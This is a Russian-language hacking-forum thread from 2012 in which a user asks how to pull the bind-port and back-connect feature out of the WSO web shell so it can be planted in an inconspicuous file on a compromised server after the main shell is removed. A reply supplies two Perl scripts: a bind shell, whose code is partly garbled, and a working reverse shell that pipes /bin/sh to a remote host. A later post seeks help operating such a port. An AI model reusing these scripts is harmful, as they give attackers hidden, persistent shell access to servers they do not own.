HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Бинд-порт
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.08.2012, 05:08
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
В всо реализован встроенный биндпорт и бэк коннект.

Цитата:
Сообщение от None  
www-data 12657 0.0 0.0 21128 2564 ? S Aug28 0:00 perl /tmp/bp.pl 31337
www-data 28492 0.0 0.0 3956 580 ? S 04:01 0:00 sh -c ps aux | grep bp.pl
www-data 28494 0.0 0.0 3956 312 ? D 04:01 0:00 sh -c ps aux | grep bp.pl
Тоесть в темпе создается перловый скрипт, биндится порт и скрипт сносится, так?

Как вырезать эту штуку из всо для отдельного использования?

Например спалили шелл, удалили. А в какой-то неприметный файлик можно воткнуть этот скрипт.

Спасибо.
 
Ответить с цитированием

  #2  
Старый 30.08.2012, 08:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
биндпорт

Код:
Code:
#!/usr/bin/perl

$SHELL="/bin/sh -i";

if (@ARGV &CONN";

		open STDERR,">&CONN";

		exec $SHELL || die print CONN "Cant execute $SHELL\n";

		close CONN;

	
	exit 0;

	}

}
бек.

Код:
Code:
#!/usr/bin/perl

use Socket;

$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");

$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");

open(STDIN, ">&SOCKET");

open(STDOUT, ">&SOCKET");

open(STDERR, ">&SOCKET");

system('/bin/sh -i');

close(STDIN);

close(STDOUT);

close(STDERR);
посмотрели бы исходники WSO, тела скриптов лежат внутри переменной, кодированные в base64
 
Ответить с цитированием

  #3  
Старый 01.09.2012, 03:30
RexelNet
Guest
Сообщений: n/a
Провел на форуме:
6589

Репутация: -5
По умолчанию
есть серв с забинденным портом , выбераю telnet , подключаюсь норм, но не выполняются команды , и не выводится результат что делать? был вариант искать рутнутый ssh Но так как нет в наличии таких, отпадает вариант, что посоветуете?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ